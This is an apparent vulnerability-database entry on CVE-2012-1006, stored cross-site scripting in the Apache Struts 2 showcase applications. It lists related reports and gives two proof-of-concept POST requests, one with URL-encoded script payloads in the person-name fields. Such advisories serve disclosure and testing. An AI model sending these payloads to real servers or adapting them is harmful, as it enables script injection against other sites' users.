Apache Struts HTML code injection vulnerabilit
Reporter | Title | Published | Views | Family All 14 |
---|---|---|---|---|
NVD | CVE-2012-1006 | 7 Feb 201204:09 | – | nvd |
Tenable Nessus | Apache Struts 2 struts2-rest-showcase orders 'clientName' Parameter Persistent XSS | 23 Jul 201200:00 | – | nessus |
Tenable Nessus | Apache Struts 2 struts2-showcase edit-person.action Persistent XSS | 23 Jul 201200:00 | – | nessus |
Prion | Cross site scripting | 7 Feb 201204:09 | – | prion |
OpenVAS | Apache Struts < 2.3.3 Showcase Multiple Persistent XSS Vulnerabilities | 8 Feb 201200:00 | – | openvas |
OpenVAS | Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities | 8 Feb 201200:00 | – | openvas |
Github Security Blog | Apache Struts Multiple Cross-site Scripting Vulnerabilities | 17 May 202201:49 | – | github |
UbuntuCve | CVE-2012-1006 | 7 Feb 201200:00 | – | ubuntucve |
Cvelist | CVE-2012-1006 | 7 Feb 201202:00 | – | cvelist |
OSV | Apache Struts Multiple Cross-site Scripting Vulnerabilities | 17 May 202201:49 | – | osv |
POC 1:
-----
Stored XSS
POST struts2-showcase/person/editPerson.action HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons
POC 2:
-----
Stored XSS
POST /struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo